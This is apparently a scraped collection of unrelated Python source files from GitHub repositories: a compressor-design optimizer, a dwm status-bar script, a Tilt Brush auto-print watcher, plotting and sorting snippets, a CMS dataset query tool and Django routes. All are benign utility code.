H_t_rel_max_coord,\r\n eta_ad_first, eta_ad_last, eta_ad_max, eta_ad_max_coord, c_a_rel_first, c_a_rel_last,\r\n R_mean_first, R_mean_last, inlet_alpha):\r\n compressor_copy = self.compressor.get_incomplete_copy()\r\n stage_num = len(compressor_copy.stage_class_list)\r\n\r\n H_t_rel_list = self._get_H_t_rel_list(self.non_linear_func_gen, H_t_rel_first, H_t_rel_last, H_t_rel_max,\r\n stage_num, H_t_rel_max_coord)\r\n eta_ad_list = self._get_eta_ad_list(self.non_linear_func_gen, eta_ad_first, eta_ad_last, eta_ad_max, stage_num,\r\n eta_ad_max_coord)\r\n c_a_rel_list = self._get_c_a_rel_list(c_a_rel_first, c_a_rel_last, stage_num)\r\n R_mean_list = self._get_R_mean_list(R_mean_first, R_mean_last, stage_num)\r\n\r\n compressor_copy.first_stage.u_out_1 = u_out_1\r\n compressor_copy.first_stage.d_rel_1 = d_rel_1\r\n compressor_copy.H_t_rel_list = H_t_rel_list\r\n compressor_copy.eta_ad_list = eta_ad_list\r\n compressor_copy.c_a_rel_list = c_a_rel_list\r\n compressor_copy.R_mean_list = R_mean_list\r\n compressor_copy.rotor_velocity_law_list = self.compressor.rotor_velocity_law_list\r\n compressor_copy.stator_velocity_law_list = self.compressor.stator_velocity_law_list\r\n compressor_copy.inlet_alpha = inlet_alpha\r\n\r\n return compressor_copy\r\n\r\n def _get_index(self):\r\n iterable_list = list()\r\n name_list = list()\r\n\r\n iterable_list.append(self.u_out_1)\r\n name_list.append('u_out_1')\r\n iterable_list.append(self.d_rel_1)\r\n name_list.append('d_rel_1')\r\n\r\n iterable_list.append(self.H_t_rel_first)\r\n 
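# The optimizer enumerates the full Cartesian product of these parameter lists
# via pandas.MultiIndex.from_product; a stripped-down equivalent (hedged sketch
# with illustrative values):
import pandas
grid = pandas.MultiIndex.from_product([[330.0, 350.0], [0.5, 0.6]],
                                      names=["u_out_1", "d_rel_1"])
for u_out_1, d_rel_1 in grid:
    pass  # build and solve one compressor variant per parameter tuple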
name_list.append('H_t_rel_first')\r\n iterable_list.append(self.H_t_rel_last)\r\n name_list.append('H_t_rel_last')\r\n iterable_list.append(self.H_t_rel_max)\r\n name_list.append('H_t_rel_max')\r\n iterable_list.append(self.H_t_rel_max_coord)\r\n name_list.append('H_t_rel_max_coord')\r\n\r\n iterable_list.append(self.eta_ad_first)\r\n name_list.append('eta_ad_first')\r\n iterable_list.append(self.eta_ad_last)\r\n name_list.append('eta_ad_last')\r\n iterable_list.append(self.eta_ad_max)\r\n name_list.append('eta_ad_max')\r\n iterable_list.append(self.eta_ad_max_coord)\r\n name_list.append('eta_ad_max_coord')\r\n\r\n iterable_list.append(self.c_a_rel_first)\r\n name_list.append('c_a_rel_first')\r\n iterable_list.append(self.c_a_rel_last)\r\n name_list.append('c_a_rel_last')\r\n\r\n iterable_list.append(self.R_mean_first)\r\n name_list.append('R_mean_first')\r\n iterable_list.append(self.R_mean_last)\r\n name_list.append('R_mean_last')\r\n iterable_list.append(self.inlet_alpha)\r\n name_list.append('inlet_alpha')\r\n\r\n index = pandas.MultiIndex.from_product(iterable_list, names=name_list)\r\n\r\n return index\r\n\r\n def _is_valid_pi_c(self, pi_c):\r\n residual = abs((pi_c - self.pi_c)) / self.pi_c\r\n return (residual < self.precision) and (pi_c >= self.pi_c)\r\n\r\n def _is_valid_pi_c_trend(self, compressor):\r\n pi_c = 1e10\r\n\r\n for stage in compressor.stages:\r\n if stage.thermal_info.pi_stag > pi_c:\r\n return False\r\n else:\r\n pi_c = stage.thermal_info.pi_stag\r\n\r\n return True\r\n\r\n def _is_valid_eta_ad(self, eta_ad):\r\n return eta_ad >= self.min_eta_ad\r\n\r\n @staticmethod\r\n def _get_compressor_info(index, names):\r\n result = dict(zip(names, index))\r\n\r\n return result\r\n\r\n @staticmethod\r\n def _get_compressor_variants_info(compressor_list, valid_index_list, parameter_names):\r\n variant_dicts = [MeanRadiusCompressorOptimizer._get_compressor_info(index, parameter_names)\r\n for index in valid_index_list]\r\n\r\n for variant_dict, compressor in zip(variant_dicts, compressor_list):\r\n variant_dict['pi_c'] = compressor.pi_stag_compressor()\r\n variant_dict['eta_ad'] = compressor.eta_ad_compressor()\r\n variant_dict['inlet_alpha'] = np.rad2deg(compressor.inlet_alpha)\r\n\r\n if not variant_dicts:\r\n return 'Solution not found'\r\n\r\n info_frame = pandas.DataFrame.from_records(variant_dicts)\r\n info_frame = info_frame[['pi_c', 'eta_ad'] + parameter_names]\r\n\r\n return info_frame\r\n\r\n def _get_validator(self, frequency=1000):\r\n optimizer = self\r\n\r\n class Validator:\r\n def __init__(self, frequency):\r\n self.frequency = frequency\r\n self.optimizer = optimizer\r\n self.processed_num = 0\r\n self.valid_num = 0\r\n self.quasi_valid_num = 0\r\n self.total_num = optimizer.get_total_variant_number()\r\n self.start_time = None\r\n\r\n self.max_eta = 0\r\n self.max_pi_c = 0\r\n self.min_eta = 1e10\r\n self.min_pi_c = 1e10\r\n\r\n self.logger = engine_logging.CompressorSearchInfo(compressor_validator=self)\r\n\r\n def validate(self, compressor):\r\n if not self.logger.started:\r\n self.logger.start()\r\n\r\n pi_c = compressor.pi_stag_compressor()\r\n eta_ad = compressor.eta_ad_compressor()\r\n\r\n if pi_c > self.max_pi_c:\r\n self.max_pi_c = pi_c\r\n if eta_ad > self.max_eta:\r\n self.max_eta = eta_ad\r\n if pi_c < self.min_pi_c:\r\n self.min_pi_c = pi_c\r\n if eta_ad < self.min_eta:\r\n self.min_eta = eta_ad\r\n\r\n self.processed_num += 1\r\n if self.optimizer._is_valid_pi_c(pi_c) and self.optimizer._is_valid_eta_ad(eta_ad):\r\n self.quasi_valid_num += 1\r\n 
if self.optimizer._is_valid_pi_c_trend(compressor):\r\n is_valid = True\r\n self.valid_num += 1\r\n else:\r\n is_valid = False\r\n else:\r\n is_valid = False\r\n\r\n if self.processed_num % frequency == 0:\r\n self.logger.finish()\r\n\r\n self.max_pi_c = 0\r\n self.max_eta = 0\r\n self.min_eta = 1e10\r\n self.min_pi_c = 1e10\r\n\r\n return is_valid\r\n\r\n return Validator(frequency)\r\n\r\n def get_compressor_df_generator(self, eps=0.01, chunk_size=1000):\r\n assert self._is_fully_initialized(), 'Object is not fully initialized.'\r\n\r\n def extend_compressor_info_df(compressor_info_df, compressor_list):\r\n compressor_info_df['compressor'] = compressor_list\r\n compressor_info_df['D_out_1'] = [compressor.stages[0].D_out_1 for compressor in compressor_list]\r\n\r\n index = self._get_index()\r\n\r\n compressor_list = list()\r\n valid_index_list = list()\r\n\r\n validator = self._get_validator()\r\n\r\n for init_tuple in index:\r\n try:\r\n compressor = self._get_compressor_model(*init_tuple)\r\n\r\n self.compressor_solver.solve(compressor, eps)\r\n\r\n if validator.validate(compressor):\r\n compressor_list.append(compressor)\r\n valid_index_list.append(init_tuple)\r\n\r\n except AssertionError as e:\r\n logger = engine_logging.CaughtErrorsLogger(e)\r\n logger.log()\r\n continue\r\n\r\n if len(valid_index_list) == chunk_size:\r\n compressor_variant_info = self._get_compressor_variants_info(compressor_list,\r\n valid_index_list, index.names)\r\n extend_compressor_info_df(compressor_variant_info, compressor_list)\r\n\r\n yield compressor_variant_info\r\n\r\n valid_index_list = list()\r\n compressor_list = list()\r\n\r\n if len(valid_index_list) > 0:\r\n compressor_variant_info = self._get_compressor_variants_info(compressor_list,\r\n valid_index_list, index.names)\r\n extend_compressor_info_df(compressor_variant_info, compressor_list)\r\n\r\n yield compressor_variant_info\r\n","repo_name":"Sovianum/compressors-site","sub_path":"gas_dynamics/compressor_engine/compressor_optimizer.py","file_name":"compressor_optimizer.py","file_ext":"py","file_size_in_byte":13447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70484483075","text":"#!/usr/bin/env python3.2\n# py3 !\n# Requires psutil module for memory and cpu usage retrieval:\n# apt-get install python3-pip\n# pip-3 install psutil\n\nimport datetime\nimport os\nimport re\nimport subprocess\nimport urllib.request\nimport xml.dom.minidom\nimport psutil\nimport time\nimport string\n\ndef run_cmd(cmd):\n return subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0].decode(\"utf-8\").strip()\n\n\nclass Segment:\n icons = {\n 'vol_mute': '\\uea30',\n 'vol_low': '\\uea31',\n 'vol_medium': '\\uea32',\n 'vol_high': '\\uea33',\n 'music': '\\uea36',\n 'mail': '\\uea22',\n 'mail_inverted': '\\ueaf6',\n 'date': '\\ueaf7',\n 'time': '\\u0001',\n 'cpu': '\\u1e41',\n 'ram': '\\ueae4',\n 'AC': '\\uea21',\n 'bat_full': '\\uea27',\n 'bat_medium': '\\uea26',\n 'bat_empty': '\\uea25',\n 'bat_charging': '\\uea28',\n 'bat_error': '\\uea24',\n }\n bars = {\n 'round-regular': '\\uead0\\uead1\\uead2\\uead3\\uead4\\uead5\\uead6',\n 'round-candycane': '\\uead0\\uead1\\uead2\\uead7\\uead8\\uead9\\ueada',\n }\n colors = {\n 'normal': '\\x01',\n 'urgent': '\\x03',\n 'error': '\\x04',\n 'white': '\\x07',\n 'warning': '\\x08',\n 'b_txt_y_bg': '\\x09',\n 'y_txt_b_gb': '\\x0C',\n 'blu_txt_b_bg': '\\x0D',\n 'b_txt_blu_bg': '\\x0A',\n 'gry_txt_b_bg': '\\x0E',\n 'b_txt_gry_bg': '\\x0B',\n 'urg_txt_gry_bg': 
'\\x0F',\n 'org_txt_gry_bg': '\\x10',\n 'None': '',\n }\n\n \n def get_bar(self, percent, length=10, text='', type='round-candycane'):\n bar = []\n fill_length = round(percent / 100 * length)\n\n chars_empty = self.bars[type][0:3]\n chars_filled = self.bars[type][3:7]\n\n if not fill_length:\n # Empty bar\n bar.append(chars_empty[0])\n bar.append(chars_empty[1] * (length - 1))\n bar.append(chars_empty[2])\n elif fill_length == length:\n # Full bar\n bar.append(chars_filled[0])\n bar.append(chars_filled[1] * (length - 1))\n bar.append(chars_filled[2])\n else:\n # Partially filled bar\n bar.append(chars_filled[0])\n bar.append(chars_filled[1] * (fill_length - 1))\n bar.append(chars_filled[3])\n\n bar.append(chars_empty[1] * (length - fill_length - 1))\n bar.append(chars_empty[2])\n\n bar = ''.join(bar)\n\n return bar + '\\u0002' + text\n #return bar #+'\\u0002'\n\n def set_icon(self, icon, color='None'):\n\n if icon == None:\n self._icon = ''\n else:\n self._icon = self.colors.get(color) + self.icons.get(icon) + '\\u00a0'\n\n\n def set_text(self, text, color='None'):\n if text == None:\n self._text = ''\n else:\n self._text = self.colors.get(color) + text #+ self.colors.get('normal')\n\n\n\nclass Music(Segment):\n trim_length = 30\n \n def __str__(self):\n return str(self._icon + self._text)\n \n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon('music', 'b_txt_y_bg')\n self.set_text('Not playing', 'b_txt_y_bg')\n\n try:\n cmd = run_cmd(['timeout', '1s', 'mpc'])\n except OSError:\n return\n\n if 'playing' in cmd:\n text = []\n\n [playing, info, dummy] = cmd.split('\\n')\n percent = int(re.search('(\\d+)%', info).group(1))\n\n if len(playing) > self.trim_length:\n playing = playing[:self.trim_length] + '...'\n\n (current, total) = re.findall('(\\d+:\\d+)', info)\n\n text.extend([\n playing,\n current + str('/') + total,\n ])\n \n if 'Discharging,' not in bat_stat and 'Charging,' not in bat_stat: # Show progress bar only if there's no bar present for the battery\n text.extend([\n self.get_bar(percent),\n ])\n\n self.set_text(' '.join(text), 'b_txt_y_bg')\n\n\nclass Vol(Segment):\n def __str__(self):\n return str(self._icon + self._text)\n \n def __init__(self):\n Segment.__init__(self)\n\n try:\n cmd = run_cmd(['amixer', 'get', 'Master'])\n except OSError:\n return\n\n try:\n volume = int(re.search('\\[(\\d+)%\\]', cmd).group(1))\n muted = re.search('\\[(on|off)\\]', cmd).group(1) == 'off'\n except AttributeError:\n self.set_icon('vol_mute')\n self.set_text('No sound')\n\n return\n\n if muted:\n self.set_icon('vol_mute', 'b_txt_blu_bg')\n self.set_text(self.get_bar(0))\n return\n\n if volume < 10:\n self.set_icon('vol_low', 'b_txt_blu_bg')\n elif volume > 70:\n self.set_icon('vol_high', 'b_txt_blu_bg')\n else:\n self.set_icon('vol_medium', 'b_txt_blu_bg')\n\n self.set_text(self.get_bar(volume), 'b_txt_blu_bg')\n\nclass MailSegment(Segment):\n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon('mail')\n self.set_text('N/A')\n\n unread = []\n hl = False\n\n try:\n for account in open(os.environ['XDG_CONFIG_HOME'] + '/gmailaccounts', encoding='utf-8'):\n (url, user, passwd) = account.split('|')\n\n auth_handler = urllib.request.HTTPBasicAuthHandler()\n auth_handler.add_password(realm='New mail feed', uri='https://mail.google.com/', user=user, passwd=passwd)\n opener = urllib.request.build_opener(auth_handler)\n urllib.request.install_opener(opener)\n\n request = urllib.request.urlopen(url)\n dom = xml.dom.minidom.parseString(request.read())\n count = 
dom.getElementsByTagName('fullcount')[0].childNodes[0].data\n\n if int(count) > 0:\n hl = True\n\n unread.append(count)\n except (IOError, ValueError, KeyError):\n return\n\n if hl:\n self.set_icon('mail')\n\n self.set_text(' / '.join(unread))\n\n\nclass Date(Segment):\n def __str__(self):\n return str(self._icon + self._text)\n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon(None, 'b_txt_gry_bg')\n self.set_text(datetime.datetime.now().strftime('%a %d'), 'b_txt_gry_bg')\n\n\nclass Time(Segment):\n def __str__(self):\n return str(self._icon + self._text)\n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon(None, 'white')\n self.set_text(datetime.datetime.now().strftime('%R'), 'white')\n \n \n\nclass Mem(Segment):\n def __str__(self):\n return str(self._icon + self._text)\n \n def __init__(self):\n Segment.__init__(self)\n\n self.set_icon('ram', 'b_txt_blu_bg')\n \n mem=str(round(psutil.phymem_usage()[3]))\n self.set_text(mem + '%', 'b_txt_blu_bg')\n \nclass CPU(Segment):\n def __str__(self):\n return self._icon + self._text\n \n def __init__(self):\n Segment.__init__(self)\n self.set_icon('cpu', 'b_txt_y_bg')\n\n # CPU percentage per core:\n #cpuloads = psutil.cpu_percent(interval=1, percpu=True)\n #cpu1 = str(round(cpuloads[0])) + '%'\n #cpu2 = str(round(cpuloads[1])) + '%'\n #self.set_text(cpu1 + ' | ' + cpu2, 'b_txt_y_bg')\n \n # CPU percentage overall:\n cpuloads = str(round(psutil.cpu_percent(interval=1)))\n if len(cpuloads) == 1:\n cpuloads=' ' + cpuloads\n self.set_text(cpuloads+'%', 'b_txt_y_bg')\n\nclass bat_(Segment):\n # FYI: to simply see whether AC power is connected: cat /sys/class/power_supply/AC/online\n def __str__(self):\n return self._icon + self._text\n \n def __init__(self):\n Segment.__init__(self)\n\n if 'Discharging,' in bat_stat:\n if percentage >= 50:\n colr='b_txt_gry_bg'\n self.set_icon('bat_full', colr)\n elif percentage <= 10:\n colr='urg_txt_gry_bg'\n self.set_icon('bat_empty', colr)\n else:\n colr='org_txt_gry_bg'\n self.set_icon('bat_medium', colr)\n self.set_text(self.get_bar(percentage, 18, '\\x0B '+str(percentage)+'%'), colr)\n elif 'Charging,' in bat_stat:\n colr='b_txt_gry_bg'\n self.set_icon('bat_charging', colr)\n self.set_text(self.get_bar(percentage, 18, '\\x0B '+str(percentage)+'%'), colr)\n #elif 'Unknown,' in bat_stat:\n # colr='urg_txt_gry_bg'\n # self.set_icon('bat_error', colr)\n # self.set_text('Battery status unknown!', colr)\n else:\n self.set_icon('AC', 'b_txt_gry_bg')\n self.set_text('')\n \nclass network(Segment):\n # FYI: to simply see whether AC power is connected: cat /sys/class/power_supply/AC/online\n def __str__(self):\n return self._icon + self._text\n \n def __init__(self):\n Segment.__init__(self)\n \n nw_data=str(psutil.network_io_counters(pernic=True))\n nw_wlan=nw_data[nw_data.find('wlan0'):nw_data.find('eth0')]\n nw_eth=nw_data[nw_data.find('eth0'):]\n \n wlan_sent=nw_wlan[nw_wlan.find('bytes_sent=')+11:nw_wlan.find(', bytes_recv')]\n wlan_recv=nw_wlan[nw_wlan.find('bytes_recv=')+11:nw_wlan.find(', packets_sent')]\n \n wlan_sent_display=round(int(wlan_sent) / 1048576, 1) # translates into MB\n \n if wlan_sent_display < 1.0:\n wlan_sent_display=str(round(int(wlan_sent) / 1024, 1)) + ' KB'\n elif wlan_sent_display > 1024.0:\n wlan_sent_display=str(round(int(wlan_sent) / 1073741824, 2)) + ' GB'\n else:\n wlan_sent_display=str(wlan_sent_display) + ' MB'\n \n \n if 'Discharging,' in bat_stat:\n if percentage >= 50:\n colr='b_txt_gry_bg'\n self.set_icon('bat_full', colr)\n elif percentage <= 10:\n 
colr='urg_txt_gry_bg'\n self.set_icon('bat_empty', colr)\n else:\n colr='org_txt_gry_bg'\n self.set_icon('bat_medium', colr)\n self.set_text(self.get_bar(percentage, 18, '\\x0B '+str(percentage)+'%'), colr)\n elif 'Charging,' in bat_stat:\n colr='b_txt_gry_bg'\n self.set_icon('bat_charging', colr)\n self.set_text(self.get_bar(percentage, 18, '\\x0B '+str(percentage)+'%'), colr)\n #elif 'Unknown,' in bat_stat:\n # colr='urg_txt_gry_bg'\n # self.set_icon('bat_error', colr)\n # self.set_text('Battery status unknown!', colr)\n else:\n self.set_icon('AC', 'b_txt_gry_bg')\n self.set_text('')\n\n#while 1:\n#def bat_stat():\n''' Returns status of the battery; first arg is -1 for discharging, 1 for charging\nor 0 for AC power, and bat percentage as second arg '''\nbat = run_cmd(['acpi', '-b'])\n\nbat=bat.split(' ')\nper=bat[3]\nbat_stat=bat[2]\n\npercentage=''\n\nfor letter in per:\n if letter not in string.punctuation:\n percentage += letter\npercentage=int(percentage)\n\n\n\nbat = str(bat_())\ncpu = str(CPU())\nmem = str(Mem())\ntime = str(Time())\ndate = str(Date())\nvol = str(Vol())\nmusic = str(Music())\n\n\n\n# tühik: \\u00a0\ncommand=str('xsetroot -name \"'+ '\\x0C\\u1e00' + cpu+ '\\x09\\u1e00\\x0D\\u1e00' + mem+ '\\x0A\\u1e00\\x0E\\u1e00' + bat +\n'\\x0B\\u1e00\\x0C\\u1e00' + music+'\\x09\\u1e00\\x0D\\u1e00'+ vol+'\\x0A\\u1e00\\x0E\\u1e00' + date + '\\x0B\\u1e00\\x07\\u00a0' + time + ' '+'\"')\nos.system(command)\n #time.sleep(1)\n","repo_name":"laur89/dwm-setup","sub_path":".dwm/bars/pybar_old_builds/py_bar_DEPRECATED.py","file_name":"py_bar_DEPRECATED.py","file_ext":"py","file_size_in_byte":11729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26128146374","text":"import win32print\r\nimport win32ui\r\nimport time\r\nimport os\r\nfrom PIL import Image, ImageWin\r\n\r\npath_to_watch = 'C:\\\\Users\\\\amire\\\\OneDrive\\\\Documents\\\\Tilt Brush\\\\Snapshots'\r\n\r\ndef printPhotoFromFilename(file_name):\r\n HORZRES = 8\r\n VERTRES = 10\r\n\r\n file_name = path_to_watch + \"\\\\\" + file_name\r\n\r\n LOGPIXELSX = 88\r\n LOGPIXELSY = 90\r\n\r\n PHYSICALWIDTH = 110\r\n PHYSICALHEIGHT = 111\r\n\r\n PHYSICALOFFSETX = 0\r\n PHYSICALOFFSETY = 0\r\n\r\n printer_name = win32print.GetDefaultPrinter ()\r\n\r\n hDC = win32ui.CreateDC ()\r\n hDC.CreatePrinterDC (printer_name)\r\n printable_area = hDC.GetDeviceCaps (HORZRES), hDC.GetDeviceCaps (VERTRES)\r\n printer_size = hDC.GetDeviceCaps (PHYSICALWIDTH), hDC.GetDeviceCaps (PHYSICALHEIGHT)\r\n printer_margins = hDC.GetDeviceCaps (PHYSICALOFFSETX), hDC.GetDeviceCaps (PHYSICALOFFSETY)\r\n\r\n bmp = Image.open (file_name)\r\n if bmp.size[0] > bmp.size[1]:\r\n bmp = bmp.rotate (0)\r\n watermark = Image.open('ramka.png')\r\n bmp.paste(watermark, (0, 0, 1080, 1920), watermark)\r\n\r\n ratios = [1.2 * printable_area[0] / bmp.size[0], 1.2 * printable_area[1] / bmp.size[1]]\r\n\r\n print(ratios)\r\n scale = min (ratios)\r\n\r\n hDC.StartDoc (file_name)\r\n hDC.StartPage ()\r\n\r\n dib = ImageWin.Dib (bmp)\r\n scaled_width, scaled_height = [int (scale * i) for i in bmp.size]\r\n x1 = int ((printer_size[0] - scaled_width) / 2)\r\n y1 = int ((printer_size[1] - scaled_height) / 2)\r\n x2 = x1 + scaled_width\r\n y2 = y1 + scaled_height\r\n dib.draw (hDC.GetHandleOutput (), (x1, y1, x2, y2))\r\n\r\n hDC.EndPage ()\r\n hDC.EndDoc ()\r\n hDC.DeleteDC ()\r\n\r\nbefore = dict ([(f, None) for f in os.listdir(path_to_watch)])\r\nphoto_time = int(time.time()-100)\r\nprint(before)\r\n\r\nwhile True:\r\n 
time.sleep(1)\r\n        after = dict ([(f, None) for f in os.listdir(path_to_watch)])\r\n        added = [f for f in after if not f in before]\r\n        if added:\r\n            if time.time()-photo_time > 60:\r\n                photo_time = time.time()\r\n                print(\" printing \" + str(added[0]))\r\n                printPhotoFromFilename(str(added[0]))\r\n                before = after","repo_name":"a-mirecki/TiltBrushAutoPrintingDriver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2407688842","text":"mode = None\n\nlist = []\n\nx = y = w = h = 0\nname = None\n\ndef flush():\n\tglobal x, y, w, h, name\n\tif mode == 'rect':\n\t\tlist.append((x,y,w,h,'box',name))\n\tif mode == 'circle':\n\t\tx = cx - rx\n\t\ty = cy - ry\n\t\tw = rx * 2\n\t\th = ry * 2\n\t\tlist.append((x,y,w,h,'circle',name))\n\tx = y = w = h = 0\n\tname = None\n\nfor line in open(\"boxes.svg\").readlines():\n\tline = line.strip()\n\tif line == \"')\n\tprint('
')\n\tprint('')\n\tfor (x,y,w,h,c,name) in list:\n\t\tx = round(x/4) - 1\n\t\ty = round(y/4) - 1\n\t\tw = round(w/4) + 2\n\t\th = round(h/4) + 2\n\t\tprint(f'
{name}
')\n\tprint('
')\n\n#print_html()\nprint_list()\n","repo_name":"rally-the-troops/nevsky","sub_path":"tools/genboxes.py","file_name":"genboxes.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22769199991","text":"import matplotlib.pyplot as plt\n\ndef display(file, machines):\n f = open(file, 'r')\n\n data = f.read()\n lines = data.split(\"\\n\")\n tr = []\n max_time = 0\n for line in lines:\n tr.append(line.split('_'))\n\n machine_times = []\n for i in range(1, machines):\n machine_times.append([])\n\n for i in range(0, len(tr)):\n if(len(tr[i]) > 4 and tr[i][2] == \"Begin\"):\n max_time = max(max_time, int(tr[i][3]))\n for j in range(i, len(tr)):\n if(tr[i][0] == tr[j][0] and tr[i][0] == tr[j][0] and\n tr[j][2] == \"Finish\"):\n machine_times[int(tr[j][4])].append([tr[i][3], tr[j][3]])\n break\n\n print(machine_times)\n fig, ax = plt.subplots()\n\n n = []\n y = []\n\n for m in range(0, machines - 1):\n n.append('Machine ' + str(m))\n y.append(m*10+5)\n v = []\n for j in range(0, len(machine_times[m])-1):\n s_time = int(machine_times[m][j][0])\n e_time = int(machine_times[m][j][1])\n v.append([s_time, e_time - s_time])\n\n ax.broken_barh(v,[m*10,9])\n\n ax.set_ylim(5, machines*10+5)\n ax.set_xlim(0, max_time+5)\n ax.set_xlabel('seconds since start')\n ax.set_yticks(y)\n ax.set_yticklabels(n)\n ax.grid(True)\n plt.show()","repo_name":"KrzysztofDabek/RAS_AssemblyLine","sub_path":"RAS_AssemblyLine/SimPlot.py","file_name":"SimPlot.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36420904199","text":"#Bubble Sort\n#Nested loop is used \n#For each loop the greatest element moves to the rightmost place\n\ndef bubbleSort(arr):\n for i in range(len(arr) -1):\n for j in range(len(arr) - 1 - i):\n if arr[j] > arr[j+1]:\n arr[j],arr[j+1]=arr[j+1],arr[j]\n print(arr)\n\nmyList=[11,9,7,5,3,2,1]\nbubbleSort(myList)\n\n\n#Time comp => O(N*N)\n#SPace comp => O(1)","repo_name":"Maanu07/dsa_python","sub_path":"Sorting/bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71649777153","text":"#!/usr/bin/env python\nimport os\nimport json\nimport subprocess\nfrom utilities import load, dump, get_das\nimport logging\n\n\nupdate = True # requery everything\nverbose = False\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s.%(msecs)03d %(levelname)s %(name)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n\n# NanoAODv6\nnano_tag = 'Nano25Oct2019'\n\n\n# mc\n# note: this doesnt get the \"new_pmx\" or weirdly named \"ext\" samples... 
maybe okay?\n# for example: RunIIFall17NanoAODv6-PU2017_12Apr2018_Nano25Oct2019_ext_102X_mc2017_realistic_v7\n# RunIIFall17NanoAODv6-PU2017_12Apr2018_Nano25Oct2019_new_pmx_102X_mc2017_realistic_v7\nyear_tags = {\n '2016': f'RunIISummer16NanoAODv6-PUMoriond17_{nano_tag}_102X_mcRun2_asymptotic_v7',\n '2017': f'RunIIFall17NanoAODv6-PU2017_12Apr2018_{nano_tag}_102X_mc2017_realistic_v7',\n '2018': f'RunIIAutumn18NanoAODv6-{nano_tag}_102X_upgrade2018_realistic_v20',\n}\n\n# datasets (note, tune changes between 2016 and 2017/2018, but not always)\ndatasets = [\n # TT\n 'TTJets_TuneCUETP8M2T4_13TeV-amcatnloFXFX-pythia8',\n 'TTJets_TuneCUETP8M2T4_13TeV-madgraphMLM-pythia8',\n 'TTJets_TuneCP5_13TeV-amcatnloFXFX-pythia8',\n 'TTJets_TuneCP5_13TeV-madgraphMLM-pythia8',\n # HAA\n 'SUSY*HToAA*AToMuMu*AToTauTau*',\n # QCD\n # note: will also match patterns like Pt-*to*_, so manually delete those (muon enriched, for example)\n 'QCD_Pt_*to*_TuneCUETP8M1_13TeV_pythia8',\n 'QCD_Pt_*to*_TuneCP5_13TeV_pythia8',\n]\n\n\ndef get_mc(update=False,verbose=False):\n\n\n for year in year_tags:\n fname = f'mc_{year}'\n result = load(fname)\n for dataset in datasets:\n query = 'dataset dataset=/{}/{}*/NANOAODSIM'.format(dataset,year_tags[year])\n samples = get_das(query,verbose=verbose)\n if not samples: continue\n thesedatasets = set(s.split('/')[1] for s in samples)\n for thisdataset in thesedatasets:\n # NOTE: manually remove QCD_Pt-\n if 'QCD_Pt-' in thisdataset: continue\n if thisdataset not in result: result[thisdataset] = {}\n sampleMap = result[thisdataset].get('files',{})\n goodsamples = []\n for sample in samples:\n if not update and sample in sampleMap: continue\n if 'Validation error' in sample: continue\n if sample.split('/')[1]!=thisdataset: continue\n query = 'file dataset={}'.format(sample)\n sampleMap[sample] = get_das(query,verbose=verbose)\n goodsamples += [sample]\n \n result[thisdataset] = {'datasets': goodsamples, 'files': sampleMap}\n dump(fname,result)\n\nget_mc(update,verbose)\n","repo_name":"dntaylor/DeepDiTau","sub_path":"get_datasets.py","file_name":"get_datasets.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29491402268","text":"from django.conf.urls import url\r\nfrom . 
import views\r\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\r\nfrom django.contrib import staticfiles\r\n\r\n#\r\nurlpatterns = [\r\n    url(r'^$', views.index, name=\"index\"),\r\n\r\n    #browse a record\r\n    url(r'^check(?P<id>[0-9]+)$', views.check, name=\"check\"),\r\n\r\n    #image upload\r\n    #load the add form\r\n    url(r'^ul$', views.ul, name=\"ul\"),\r\n    #perform the add\r\n    url(r'^upload$', views.upload, name=\"upload\"),\r\n\r\n    #delete a record\r\n    url(r'^delete/(?P<id>[0-9]+)$', views.delete, name=\"delete\"),\r\n\r\n    #edit a record\r\n    #load the edit form\r\n    url(r'^edit/(?P<id>[0-9]+)$', views.edit, name=\"edit\"),\r\n    #perform the update\r\n    url(r'^update/$', views.update, name=\"update\"),\r\n]\r\n\r\nurlpatterns += staticfiles_urlpatterns()\r\n","repo_name":"lvz5069au/week5_hw","sub_path":"album/Oam/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18791346226","text":"from collections import OrderedDict\n\ndef prototype_state():\n    state = {} \n    \n    # Random seed\n    state['seed'] = 1234\n    # Logging level\n    state['level'] = 'DEBUG'\n\n    # These are unknown word placeholders\n    state['oov'] = '<unk>'\n    # Watch out for these\n    state['unk_sym'] = 0\n    state['eos_sym'] = 2\n    state['sos_sym'] = 1\n\n    state['n_samples'] = 40\n    \n    # These are end-of-sequence marks\n    state['start_sym_sent'] = '<s>'\n    state['end_sym_sent'] = '</s>'\n    \n    # Low-rank approximation activation function\n    state['rank_n_activ'] = 'lambda x: x'\n\n    # ----- SIZES ----\n    # Dimensionality of hidden layers\n    state['qdim'] = 512\n    # Dimensionality of low-rank approximation\n    state['rankdim'] = 256\n\n    # Threshold to clip the gradient\n    state['cutoff'] = 1.\n    state['lr'] = 0.0001\n\n    # Early stopping configuration\n    state['patience'] = 5\n    state['cost_threshold'] = 1.003\n    \n    # ----- TRAINING METHOD -----\n    # Choose optimization algorithm\n    state['updater'] = 'adam'\n    \n    # Batch size\n    state['bs'] = 128 \n    \n    